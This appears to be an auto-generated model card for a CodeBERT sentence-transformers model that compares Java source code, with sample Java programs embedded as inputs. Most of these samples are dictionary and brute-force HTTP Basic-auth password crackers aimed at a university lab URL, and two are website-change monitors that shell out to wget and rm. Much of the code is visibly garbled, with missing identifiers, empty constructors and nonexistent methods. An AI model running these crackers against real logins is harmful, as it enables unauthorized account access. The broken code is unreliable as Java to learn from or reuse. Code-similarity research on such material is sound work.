Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks
Paper • 1908.10084 • Published • 13
How to use buelfhood/SOCO-Java-CodeBERT-ST with sentence-transformers:
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERT-ST")
sentences = [
"import java.io.*;\nimport java.net.*;\nimport java.*;\nimport java.Runtime.*;\nimport java.Object.*;\nimport java.util.*;\nimport java.util.StringTokenizer;\n\npublic class Dictionary \n{\n String uname = \"\";\n String pword = \"null\";\n Vector v = new Vector();\n int runTime;\n public void doConnect(String connect, int num)\n {\n String = connect;\n \n try\n {\n URL secureSite = new URL();\n URLConnection connection = secureSite.openConnection();\n if (uname != null || pword != null)\n\t {\n\t \n\t for(int i=num; i<v.size(); i++)\n\t {\n\t pword = (String)v.elementAt(i);\n\t String up = uname + \":\" + pword;\n String encoding;\n try\n\t\t{\n\t\t connection.misc.BASE64Encoder encoder = (con.misc.BASE64Encoder) Class.forName(\".misc.BASE64Encoder\").newInstance();\n\t\t encoding = encoder.encode (up.getBytes());\n\t\t \n }\n\t catch (Exception ex) \n {\n\t\t Base64Converter encoder = new Base64Converter();\n\t\t System.out.println(\"in catch\");\n encoding = encoder.encode(up.getBytes());\n }\n\t connection.setRequestProperty (\"Authorization\", \" \" + encoding);\n connection.connect();\n if(connection instanceof HttpURLConnection)\n\t {\n\t HttpURLConnection httpCon=(HttpURLConnection)connection;\n if(httpCon.getResponseCode()==HttpURLConnection.HTTP_UNAUTHORIZED)\n\t\t {\n\t\t System.out.println(\"Not authorized - check for details\" + \" -Incorrect Password : \" + pword);\n\t doConnect(i, i+1);\n\t }\n\t\telse\n\t\t { \n\t\t System.out.println(\"\\n\\n\\nPassword for HTTP Secure Site by Dictionary Attack:\");\n\t System.out.println( +\"\\tPassword : \"+ pword);\n\n runTime = System.currentTimeMillis() - runTime; \n System.out.println(\"Time taken crack password (in seconds)\"+\" : \"+ runTime/1000+\"\\n\"+ \"Tries taken crack password : \"+ i);\n\t System.exit(0);\n\t }\n\t }\n\t }\n }\n }\n catch(Exception ex)\n {\n ex.printStackTrace();\n }\n }\n public Vector getPassword()\n {\n try\n {\n ReadFile rf = new ReadFile();\n rf.loadFile();\n v = rf.getVector();\n }\n catch(Exception ex)\n {\n ex.printStackTrace();\n }\n return v;\n } \n public void setTimeTaken( int timetaken)\n {\n runTime = timetaken;\n } \n public static void main ( String args[] ) throws IOException \n {\n \n runTime1 = System.currentTimeMillis(); \n Dictionary newDo = new Dictionary();\n newDo.setTimeTaken(runTime1);\n newDo. getPassword();\n String site = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n newDo.doConnect(site, 0);\n \n } \n \n}\n\nclass Base64Converter\n {\n \n public final char [ ] alphabet = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', \n 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', \n 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', \n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', \n 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', \n 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', \n 'w', 'x', 'y', 'z', '0', '1', '2', '3', \n '4', '5', '6', '7', '8', '9', '+', '/' }; \n \n \n public String encode ( String s )\n {\n return encode ( s.getBytes ( ) );\n }\n \n public String encode ( byte [ ] octetString )\n {\n int bits24;\n int bits6;\n \n char [ ] out\n = new char [ ( ( octetString.length - 1 ) / 3 + 1 ) * 4 ];\n \n int outIndex = 0;\n int i = 0;\n \n while ( ( i + 3 ) <= octetString.length ) {\n \n bits24=( octetString [ i++ ] & 0xFF ) << 16;\n bits24 |=( octetString [ i++ ] & 0xFF ) << 8;\n \n bits6=( bits24 & 0x00FC0000 )>> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0000003F );\n out [ outIndex++ ] = alphabet [ bits6 ];\n }\n \n if ( octetString.length - i == 2 )\n {\n \n bits24 = ( octetString [ i ] & 0xFF ) << 16;\n bits24 |=( octetString [ i + 1 ] & 0xFF ) << 8;\n bits6=( bits24 & 0x00FC0000 )>> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n out [ outIndex++ ] = alphabet [ bits6 ];\n \n \n out [ outIndex++ ] = '=';\n }\n else if ( octetString.length - i == 1 )\n {\n \n bits24 = ( octetString [ i ] & 0xFF ) << 16;\n bits6=( bits24 & 0x00FC0000 )>> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n \n \n out [ outIndex++ ] = '=';\n out [ outIndex++ ] = '=';\n }\n \n return new String ( out );\n }\n }\n \n \n",
"\n\n\nimport java.io.*;\nimport java.util.*;\nimport java.*;\nimport java.net.*;\n\npublic class WatchDog\n{\n\n static Process p = null;\n static Process qproc = null;\n\n static BufferedReader bf = null;\n static StringTokenizer tok = null;\n\n static String Path = null;\n static String str = null;\n static String urlStr=null;\n static boolean changed = false;\n\n static File indexfile = new File(\"index.html\");\n static File tmpfile = new File(\"tmpindex.html\");\n static File mdfile = new File(\"md5file.txt\");\n static File tmpmdfile = new File(\"tmpmd5file.txt\");\n static PrintWriter mailwriter = null;\n\n\n public static void main (String[] args) \n {\n\n urlStr = \"http://www.cs.rmit.edu./\";\n\n try\n {\n \n mailwriter = new PrintWriter(new BufferedWriter(new FileWriter(\"tomail.txt\", false)));\n\n getLatest(urlStr);\n parseFile(); \n\n mailwriter.read();\n\n if(changed)\n {\n System.out.println(\"Sending Mail\");\n p = Runtime.getRuntime().exec(\"./mailscript\");\n p.waitFor();\n\n }\n else\n System.out.println(\" mail sent\");\n\n } catch (IOException ioe)\n {\n System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch (InterruptedException intex)\n {\n System.out.println(\"Interrupted Exception\");\n intex.printStackTrace();\n }\n\n\n }\n\n\n static void getLatest(String urlStr)\n { \n \n URL url = null;\n \n try\n {\n url = new URL(urlStr);\n\n } catch (MalformedURLException mfurl)\n {\n System.out.println(\"Malformed URL\");\n mfurl.printStackTrace();\n }\n\n try\n {\n mailwriter.println();\n\n p = Runtime.getRuntime().exec(\"/usr//pwd\"); \n p.waitFor();\n bf= new BufferedReader(new InputStreamReader(\n p.getInputStream()));\n\n Path=bf.readLine();\n\n if (indexfile.exists())\n {\n mailwriter.println(\"File with name 'index.html' found in directory.\");\n mailwriter.println(\"Renaming existing 'index.html' 'tmpindex.html...\");\n p = Runtime.getRuntime().exec(\"/usr//mv \"+indexfile+ \" \" + Path+\"/\"+tmpfile);\n p.waitFor();\n p = Runtime.getRuntime().exec(\"/usr//mv \"+mdfile+ \" \" + Path+\"/\"+tmpmdfile);\n mailwriter.println();\n mailwriter.println(\"File with name 'md5file.txt' found in directory.\");\n mailwriter.print(\"Renaming existing 'md5file.txt' 'tmpmd5file.txt...\");\n\n mailwriter.println(\".\");\n\n mailwriter.println();\n }\n\n mailwriter.println(\"Downloading current version of site - \" + urlStr);\n p = Runtime.getRuntime().exec(\"/usr/local//wget \"+url);\n p.waitFor();\n if (!tmpfile.exists())\n {\n mailwriter.println(\"File - \" + urlStr + \"index.html saved disk for the first time.\");\n }\n\n\n } catch (IOException ioe)\n {\n System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch (IndexOutOfBoundsException iobe)\n {\n System.out.println(\"Index Out Of Bounds Exception\");\n iobe.printStackTrace();\n }\n catch (Exception e)\n {\n System.out.println(\"Exception\");\n e.printStackTrace();\n }\n }\n\n static void parseFile()\n {\n\n Vector imgVect = new Vector();\n\n try\n {\n p = Runtime.getRuntime().exec(\"/usr//grep img \" + Path + \"/\"+ indexfile);\n p.waitFor();\n bf = new BufferedReader(new InputStreamReader(\n p.getInputStream()));\n\n while((str=bf.readLine())!=null)\n {\n bf = new StringTokenizer(str, \"\\\"\", false);\n \n while(bf.hasMoreTokens())\n {\n str=bf.nextToken();\n if ((str.indexOf(\"gif\") > 0) || (str.indexOf(\"jpg\") > 0))\n imgVect.addElement(str);\n }\n \n }\n\n }catch (IOException ioe)\n {\n System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch (Exception e)\n {\n System.out.println(\"Exception\");\n e.printStackTrace();\n }\n\n mailwriter.println(\"Creating file with md5sums of the webpage and images...\");\n md5Create(imgVect);\n\n }\n\n static void md5Create(Vector imgVect)\n {\n String tmpString = null;\n Vector imgNames = new Vector();\n\n try\n {\n PrintWriter pr = new PrintWriter(new BufferedWriter(new FileWriter(mdfile, false)));\n \n p=Runtime.getRuntime().exec(\"/usr/local//md5sum \"+indexfile);\n p.waitFor();\n bf= new BufferedReader(new InputStreamReader(\n p.getInputStream()));\n pr.println(bf.readLine());\n \n for(int i=0; i<imgVect.size();i++)\n {\n imgNames.insertElementAt((getImgNames((String)imgVect.elementAt(i))), i);\n imgVect.setElementAt((getFullPath((String)imgVect.elementAt(i))), i);\n\n p=Runtime.getRuntime().exec(\"/usr/local//md5sum \"+(String)imgNames.elementAt(i));\n p.waitFor();\n bf= new BufferedReader(new InputStreamReader(\n p.getInputStream()));\n pr.println(bf.readLine());\n rmImgFile(Path+\"/\"+(String)imgNames.elementAt(i));\n }\n pr.get();\n\n } catch (IOException ioe)\n {\n System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch (InterruptedException intex)\n {\n System.out.println(\"Interrupted Exception\");\n intex.printStackTrace();\n }\n\n if (tmpmdfile.exists())\n compVersions((imgVect.size())+1);\n\n }\n\n static void compVersions(int numlines)\n {\n\n int tmp = 0;\n int x = 0;\n String[] md5A = new String[numlines];\n Vector tmpmd5V = new Vector(); \n \n \n String[] tmpmd5A = null;\n StringTokenizer stoken = null;\n String mdImgName = null;\n String mdImgVal = null;\n String tmpImgName = null;\n String tmpImgVal = null;\n\n try\n {\n\n bf = new BufferedReader(new FileReader(mdfile));\n\n while((str = bf.readLine()) != null)\n {\n md5A[tmp]=str;\n tmp++;\n }\n\n bf = new BufferedReader(new FileReader(tmpmdfile));\n tmp=0;\n\n while ((str = bf.readLine()) !=null)\n {\n tmpmd5V.addElement(str);\n tmp++;\n }\n\n tmpmd5A = (String[])tmpmd5V.toArray(new String[tmpmd5V.size()]); \n\n if (tmpmd5A[0].compareTo(md5A[0]) != 0)\n {\n mailwriter.println(\"---The file index.html has changed.---\");\n mailwriter.println(\"-Diff of old and new -\");\n changed=true;\n mailwriter.println();\n p=Runtime.getRuntime().exec(\"/usr/local//diff index.html tmpindex.html\");\n p.waitFor();\n bf= new BufferedReader(new InputStreamReader(p.getInputStream()));\n\n while ((str = bf.readLine()) != null)\n mailwriter.println(str);\n\n }\n else\n {\n mailwriter.println(\"The file index.html hasn't changed.\");\n mailwriter.println();\n }\n\n mailwriter.println();\n mailwriter.println(\"Changes Images\");\n mailwriter.println(\"-----------------\");\n\n\n \n\n for (tmp=1; tmp<md5A.length; tmp++) \n {\n stoken = new StringTokenizer(md5A[tmp]);\n mdImgVal = stoken.nextToken();\n mdImgName = stoken.nextToken();\n for (x=1; x<tmpmd5A.length; x++)\n {\n stoken = new StringTokenizer(tmpmd5A[x]);\n tmpImgVal = stoken.nextToken();\n tmpImgName = stoken.nextToken();\n\n if (mdImgName.compareTo(tmpImgName) == 0)\n {\n if(mdImgVal.compareTo(tmpImgVal) == 0)\n {\n \n break;\n }\n else\n {\n mailwriter.println(\"The image \"+mdImgName+\" has changed.\");\n changed=true;\n break;\n }\n }\n if (x == ((tmpmd5A.length)-1))\n {\n mailwriter.println(\"The image \"+mdImgName+\" is new this \");\n changed=true;\n }\n }\n }\n\n for (tmp=1; tmp<tmpmd5A.length; tmp++) \n {\n stoken = new StringTokenizer(tmpmd5A[tmp]);\n tmpImgVal = stoken.nextToken();\n tmpImgName = stoken.nextToken();\n for (x=1; x<md5A.length; x++)\n {\n stoken = new StringTokenizer(md5A[x]);\n mdImgVal = stoken.nextToken();\n mdImgName = stoken.nextToken();\n if (tmpImgName.compareTo(mdImgName) == 0)\n {\n break;\n }\n if (x == ((md5A.length)-1))\n {\n mailwriter.println(\"The image \"+tmpImgName+\" is longer the \");\n changed=true;\n }\n }\n }\n\n\n } catch(IOException ioe)\n {System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch(InterruptedException iex)\n {System.out.println(\"Interrupted Exception\");\n iex.printStackTrace();\n }\n\n }\n\n\n static Object getFullPath(String fname)\n {\n \n\n if(fname.charAt(0)== '/') \n fname=urlStr+fname; \n else if(fname.charAt(0) != 'h')\n fname=urlStr+'/'+fname;\n\n getImgFile(fname);\n\n return (Object)fname; \n }\n\n static void getImgFile(String fullPath)\n {\n \n\n try\n {\n qproc=Runtime.getRuntime().exec(\"/usr/local//wget \"+fullPath);\n qproc.waitFor();\n\n } catch (IOException ioe)\n {\n System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch (InterruptedException intex)\n {\n System.out.println(\"Interrupted Exception\");\n intex.printStackTrace();\n }\n }\n\n static void rmImgFile(String delpath)\n {\n \n\n try\n {\n qproc=Runtime.getRuntime().exec(\"/usr//rm \"+ delpath);\n qproc.waitFor();\n\n } catch (IOException ioe)\n {\n System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch (InterruptedException intex)\n {\n System.out.println(\"Interrupted Exception\");\n intex.printStackTrace();\n }\n \n }\n\n static Object getImgNames(String prsName)\n {\n \n \n String str = new StringTokenizer(prsName, \"/\", false);\n\n while(str.hasMoreTokens())\n {\n str=bgf.nextToken();\n if ((str.indexOf(\"gif\") > 0) || (str.indexOf(\"jpg\") > 0))\n prsName=str;\n }\n return (Object)prsName;\n }\n}\n",
"import java.io.*;\nimport java.text.*;\nimport java.util.*;\nimport java.net.*;\n\npublic class WatchDog\n{\n private String address;\n private UnixMailing email;\n\n private int step = 0;\n private String buffer = \"\";\n\n public static void main(String [] args)\n {\n if (args.length < 2)\n {\n System.err.println(\"Invalid usage!\");\n System.err.println(\"Usage: java WatchDog <url> <email>\");\n System.exit(1);\n }\n\n String address = args[0];\n String email = args[1];\n WatchDog theProg = new WatchDog(address, email);\n\n try\n {\n File currDir = new File(\".\");\n File [] list = currDir.listFiles();\n for (int i = 0; i < list.length; i++)\n {\n if (list[i].getName().trim().startsWith(\"_buffer\"))\n list[i].delete();\n }\n }\n catch(Exception e) {}\n\n while (true)\n {\n theProg.checkPage();\n try\n {\n Thread.sleep();\n }\n catch(InterruptedException e ) {}\n }\n\n }\n\n public WatchDog(String address, String email)\n {\n this.address = address;\n this.email = new UnixMailing(email);\n }\n\n public void checkPage()\n {\n try\n {\n File buffFp = new File(\"_bufferFile.html\");\n Vector imgs = new Vector();\n\n boolean getAgain = false;\n if (buffFp.exists())\n {\n URLConnection conn = (new URL(address)).openConnection();\n conn.setDoInput(true);\n conn.connect();\n DataInputStream inNet = new DataInputStream(conn.getInputStream());\n\n System.out.println(\"Checking file \"+address);\n char i = '\\0';\n char f = '\\0';\n DataInputStream inFile = new DataInputStream(\n new FileInputStream(buffFp));\n try\n {\n int step = 0;\n while(true)\n {\n i = (char)inNet.readByte();\n f = (char)inFile.readByte();\n\n if (i != f)\n {\n email.println(\" changes in the content of the web: \"+address);\n System.out.println(\" changes in the content of the web: \"+address);\n getAgain = true;\n break;\n }\n tokenImages(i, imgs);\n }\n }\n catch(EOFException eofe) {}\n\n if (!getAgain)\n {\n try\n {\n i = (char)inNet.readByte();\n email.println(\" changes in the content of the web: \"+address);\n System.out.println(\" changes in the content of the web: \"+address);\n getAgain = true;\n }\n catch(EOFException eofe) {}\n try\n {\n f = (char)inFile.readByte();\n email.println(\" changes in the content of the web: \"+address);\n System.out.println(\" changes in the content of the web: \"+address);\n getAgain = true;\n }\n catch(EOFException eofe) {}\n }\n\n inFile.print();\n inNet.print();\n }\n else\n getAgain = true;\n\n\n if (getAgain)\n {\n getAgain = false;\n URLConnection conn = (new URL(address)).openConnection();\n conn.setDoInput(true);\n conn.connect();\n DataInputStream inNet = new DataInputStream(conn.getInputStream());\n\n System.out.println(\"Storing file \"+address);\n DataOutputStream outFile = new DataOutputStream(\n new FileOutputStream(buffFp));\n byte i = 0;\n try\n {\n while(true)\n {\n i = inNet.readByte();\n outFile.writeByte(i);\n tokenImages((char)i, imgs);\n }\n }\n catch(EOFException eofe) {}\n\n outFile.print();\n inNet.print();\n }\n for(int index = 0; index < imgs.size(); index++)\n checkImage(address, (String)imgs.get(index));\n email.sent();\n }\n catch(Exception e)\n {\n e.printStackTrace();\n }\n }\n\n\n public void tokenImages(char i, Vector imgs)\n {\n if (step == 1) \n {\n if (i == 'i' && buffer.length() <= 0 ||\n i == 'm' && buffer.equals(\"i\") ||\n i == 'g' && buffer.equals(\"im\"))\n {\n buffer += i;\n buffer = buffer.toLowerCase();\n }\n else\n {\n if (Character.isWhitespace(i) && buffer.equals(\"img\"))\n step = 2;\n else if (!Character.isWhitespace(i) || buffer.length() > 0)\n step = 0;\n buffer = \"\";\n }\n }\n else if (step == 2) \n {\n if (i == 's' && buffer.length() <= 0 ||\n i == 'r' && buffer.equals(\"s\") ||\n i == 'c' && buffer.equals(\"sr\"))\n {\n buffer += i;\n buffer = buffer.toLowerCase();\n }\n else\n {\n if (Character.isWhitespace(i) && buffer.equals(\"src\"))\n step = 3;\n else if (i == '=' && buffer.equals(\"src\"))\n step = 4;\n else if (i == '>')\n step = 0;\n buffer = \"\";\n }\n }\n else if (step == 3) \n {\n if (i == '=')\n {\n step = 4;\n }\n else if (!Character.isWhitespace(i))\n {\n if(i == '>')\n step = 0;\n else\n step = 2;\n buffer = \"\";\n }\n }\n else if (step == 4) \n {\n if (i == '\\\"')\n {\n step = 5;\n buffer = \"\";\n }\n else if (!Character.isWhitespace(i))\n {\n if(i == '>')\n {\n buffer = \"\";\n step = 0;\n }\n else\n {\n buffer = \"\"+i;\n step = 6;\n }\n\n }\n\n }\n else if (step == 5) \n {\n if (i == '\\\"')\n {\n if (buffer.trim().length() > 0)\n imgs.add(buffer);\n buffer = \"\";\n step = 0;\n }\n else\n buffer += i;\n }\n else if (step == 6) \n {\n if (Character.isWhitespace(i) || i == '>')\n {\n if (buffer.trim().length() > 0)\n imgs.add(buffer);\n buffer = \"\";\n step = 0;\n }\n else\n buffer += i;\n }\n else if(i == '<')\n {\n step = 1;\n buffer = \"\";\n }\n }\n\n public void checkImage(String hostUrl, String imageUrl)\n {\n try\n {\n String fullURL = \"\";\n if (imageUrl.startsWith(\"http\"))\n {\n fullURL = imageUrl;\n }\n else if (imageUrl.startsWith(\"/\"))\n {\n fullURL = \"http://\"+(new URL(hostUrl)).getHost()+imageUrl;\n }\n else\n {\n String path = (new URL(hostUrl)).getPath();\n if (!path.endsWith(\"/\"))\n path = path.substring(0, path.lastIndexOf('/')+1);\n\n fullURL = \"http://\"+(new URL(hostUrl)).getHost()+path+imageUrl;\n }\n\n File buffFp = new File(\"_buffer\"+\n (new URL(fullURL)).getPath().replaceAll(\"/\", \"_\"));\n Vector imgs = new Vector();\n\n boolean getAgain = false;\n if (buffFp.exists())\n {\n URLConnection conn = (new URL(fullURL)).openConnection();\n conn.setDoInput(true);\n conn.connect();\n DataInputStream inNet = new DataInputStream(conn.getInputStream());\n\n System.out.println(\"Checking image: \"+fullURL);\n byte i = 0;\n byte f = 0;\n DataInputStream inFile = new DataInputStream(\n new FileInputStream(buffFp));\n try\n {\n int step = 0;\n while(true)\n {\n i = inNet.readByte();\n f = inFile.readByte();\n\n if (i != f)\n {\n email.println(\"Image \"+fullURL+\" has been change!\");\n System.out.println(\"Image \"+fullURL+\" has been change!\");\n getAgain = true;\n break;\n }\n }\n }\n catch(EOFException eofe) {}\n\n if (!getAgain)\n {\n try\n {\n i = inNet.readByte();\n email.println(\"Image \"+fullURL+\" has been change!\");\n System.out.println(\"Image \"+fullURL+\" has been change!\");\n getAgain = true;\n }\n catch(EOFException eofe) {}\n try\n {\n f = inFile.readByte();\n email.println(\"Image \"+fullURL+\" has been change!\");\n System.out.println(\"Image \"+fullURL+\" has been change!\");\n getAgain = true;\n }\n catch(EOFException eofe) {}\n }\n\n inFile.print();\n inNet.print();\n }\n else\n getAgain = true;\n\n if (getAgain)\n {\n getAgain = false;\n URLConnection conn = (new URL(fullURL)).openConnection();\n conn.setDoInput(true);\n conn.connect();\n DataInputStream inNet = new DataInputStream(conn.getInputStream());\n\n System.out.println(\"Storing the image: \"+fullURL);\n DataOutputStream outFile = new DataOutputStream(\n new FileOutputStream(buffFp));\n byte i = 0;\n try\n {\n while(true)\n {\n i = inNet.readByte();\n outFile.writeByte(i);\n }\n }\n catch(EOFException eofe) {}\n\n outFile.print();\n inNet.print();\n }\n }\n catch(Exception e)\n {\n e.printStackTrace();\n }\n }\n}\n\n",
"import java.net.*;\nimport java.util.*;\n\npublic class BruteForce {\n\n public static void main(String[] args) {\n new CrackAttempt();\n }\n}\n\nclass CrackAttempt {\n public CrackAttempt() {\n final int MAX_LENGTH = 3;\n boolean auth = false;\n Date = new Date();\n boolean morePasswords = true;\n int passPtr = 0;\n StringBuffer validChars = new StringBuffer(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\");\n char[] password = new char[MAX_LENGTH];\n\n password[0] = validChars.charAt(0);\n while (!auth && morePasswords) {\n String resource = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n try {\n \n Authenticator.setDefault(new CrackAuth(password));\n URL url = new URL(resource);\n HttpURLConnection conn = (HttpURLConnection)url.openConnection();\n conn.setRequestMethod(\"HEAD\");\n if (conn.getResponseCode() == HttpURLConnection.HTTP_OK) {\n System.out.println(\"cracked with \" + new String(password));\n auth = true;\n }\n } catch (Exception e) {\n System.out.println(\" was exception: \" + e.getMessage());\n }\n int count = passPtr;\n while (true) {\n if (password[count] == validChars.charAt(validChars.length() - 1)) {\n password[count] = validChars.charAt(0);\n count--;\n } else {\n password[count] = validChars.charAt(validChars.indexOf(String.valueOf(password[count])) + 1);\n break;\n }\n if (count < 0) {\n \n if (passPtr < MAX_LENGTH - 1) {\n passPtr++;\n password[passPtr] = validChars.charAt(0);\n } else {\n morePasswords = false;\n }\n break;\n }\n }\n \n } \n if (!auth) {\n System.out.println(\"Unable determine password\");\n } else {\n time = (new Date()).getTime() - start.getTime();\n System.out.println(\"it took \" + String.valueOf(time) + \" milliseconds crack the password\");\n }\n }\n}\n\nclass CrackAuth extends Authenticator {\n char[] password;\n public CrackAuth(char[] password) {\n this.password = password;\n }\n\n protected PasswordAuthentication getPasswordAuthentication()\n {\n String user = \"\";\n return new PasswordAuthentication(user, password);\n }\n}\n"
]
embeddings = model.encode(sentences)
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [4, 4]This is a sentence-transformers model finetuned from microsoft/codebert-base. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERT-ST")
# Run inference
sentences = [
'\nimport java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary\n{\n private String myUsername = "";\n private String myPassword = "";\n private String urlToCrack = "http://sec-crack.cs.rmit.edu./SEC/2";\n\n\n public static void main (String args[])\n {\n Dictionary d = new Dictionary();\n }\n\n public Dictionary()\n {\n generatePassword();\n }\n\n \n\n public void generatePassword()\n {\n try\n {\n BufferedReader = new BufferedReader(new FileReader("/usr/share/lib/dict/words"));\n\n \n {\n myPassword = bf.readLine();\n crackPassword(myPassword);\n } while (myPassword != null);\n }\n catch(IOException e)\n { }\n }\n\n\n \n\n public void crackPassword(String passwordToCrack)\n {\n String data, dataToEncode, encodedData;\n\n try\n {\n URL url = new URL (urlToCrack);\n\n \n\n dataToEncode = myUsername + ":" + passwordToCrack;\n\n \n\n encodedData = new bf.misc.BASE64Encoder().encode(dataToEncode.getBytes());\n\n URLConnection urlCon = url.openConnection();\n urlCon.setRequestProperty ("Authorization", " " + encodedData);\n\n InputStream is = (InputStream)urlCon.getInputStream();\n InputStreamReader isr = new InputStreamReader(is);\n BufferedReader bf = new BufferedReader (isr);\n\n \n {\n data = bf.readLine();\n System.out.println(data);\n displayPassword(passwordToCrack);\n } while (data != null);\n }\n catch (IOException e)\n { }\n }\n\n\n public void displayPassword(String foundPassword)\n {\n System.out.println("\\nThe cracked password is : " + foundPassword);\n System.exit(0);\n }\n}\n\n\n',
'\nimport java.io.*;\n\npublic class PasswordFile {\n \n private String strFilepath;\n private String strCurrWord;\n private File fWordFile;\n private BufferedReader in;\n \n \n public PasswordFile(String filepath) {\n strFilepath = filepath;\n try {\n fWordFile = new File(strFilepath);\n in = new BufferedReader(new FileReader(fWordFile));\n }\n catch(Exception e)\n {\n System.out.println("Could not open file " + strFilepath);\n }\n }\n \n String getPassword() {\n return strCurrWord;\n }\n \n String getNextPassword() {\n try {\n strCurrWord = in.readLine();\n \n \n \n }\n catch (Exception e)\n {\n \n return null;\n }\n \n return strCurrWord;\n }\n \n}\n',
'\n\n\nimport java.misc.BASE64Encoder;\nimport java.misc.BASE64Decoder;\n\nimport java.io.*;\nimport java.net.*;\nimport java.util.*;\n\n\npublic class BruteForce {\n \n static char [] passwordDataSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".toCharArray();\n \n private int indices[] = {0,0,0};\n \n private String url = null;\n\n \n public BruteForce(String url) {\n this.url = url;\n\n }\n \n private int attempts = 0;\n private boolean stopGen = false;\n \n public String getNextPassword(){\n String nextPassword = "";\n for(int i = 0; i <indices.length ; i++){\n if(indices[indices.length -1 ] == passwordDataSet.length)\n return null;\n if(indices[i] == passwordDataSet.length ){\n indices[i] = 0;\n indices[i+1]++;\n }\n nextPassword = passwordDataSet[indices[i]]+nextPassword;\n\n if(i == 0)\n indices[0]++;\n\n }\n return nextPassword;\n }\n \n public void setIndices(int size){\n this.indices = new int[size];\n for(int i = 0; i < size; i++)\n this.indices[i] = 0;\n }\n public void setPasswordDataSet(String newDataSet){\n this.passwordDataSet = newDataSet.toCharArray();\n }\n \n public String crackPassword(String user) throws IOException, MalformedURLException{\n URL url = null;\n URLConnection urlConnection = null;\n String outcome = null;\n String authorization = null;\n String password = null;\n BASE64Encoder b64enc = new BASE64Encoder();\n InputStream content = null;\n BufferedReader in = null;\n String line;\n int i = 0;\n while(!"HTTP/1.1 200 OK".equalsIgnoreCase(outcome)){\n url = new URL(this.url);\n urlConnection = url.openConnection();\n urlConnection.setDoInput(true);\n urlConnection.setDoOutput(true);\n\n\n urlConnection.setRequestProperty("GET", url.getPath() + " HTTP/1.1");\n urlConnection.setRequestProperty("Host", url.getHost());\n password = getNextPassword();\n if(password == null)\n return null;\n System.out.print(password);\n authorization = user + ":" + password;\n\n\n urlConnection.setRequestProperty("Authorization", " "+ b64enc.encode(authorization.getBytes()));\n\n\noutcome = urlConnection.getHeaderField(null); \n\n\n\n this.attempts ++;\n urlConnection = null;\n url = null;\n\n if(this.attempts%51 == 0)\n for(int b = 0; b < 53;b++)\n System.out.print("\\b \\b");\n else\n System.out.print("\\b\\b\\b.");\n\n }\n return password;\n }\n \n public int getAttempts(){\n return this.attempts;\n }\n public static void main (String[] args) {\n if(args.length != 2){\n System.out.println("usage: java attacks.BruteForce <url crack: e.g. http://sec-crack.cs.rmit.edu./SEC/2/> <username: e.g. >");\n System.exit(1);\n }\n\n BruteForce bruteForce1 = new BruteForce(args[0]);\n try{\n Calendar cal1=null, cal2=null;\n cal1 = Calendar.getInstance();\n System.out.println("Cracking started at: " + cal1.getTime().toString());\n String password = bruteForce1.crackPassword(args[1]);\n if(password != null)\n System.out.println("\\nPassword is: "+password);\n else\n System.out.println("\\nPassword could not retrieved!");\n cal2 = Calendar.getInstance();\n System.out.println("Cracking finished at: " + cal2.getTime().toString());\n Date d3 = new Date(cal2.getTime().getTime() - cal1.getTime().getTime());\n System.out.println("Total Time taken crack: " + (d3.getTime())/1000 + " sec");\n System.out.println("Total attempts : " + bruteForce1.getAttempts());\n\n }catch(MalformedURLException mue){\n mue.printStackTrace();\n }\n\n catch(IOException ioe){\n ioe.printStackTrace();\n }\n }\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
sentence_0, sentence_1, and label| sentence_0 | sentence_1 | label | |
|---|---|---|---|
| type | string | string | int |
| details |
|
|
|
| sentence_0 | sentence_1 | label |
|---|---|---|
|
|
0 |
|
|
0 |
|
import java.io.; |
0 |
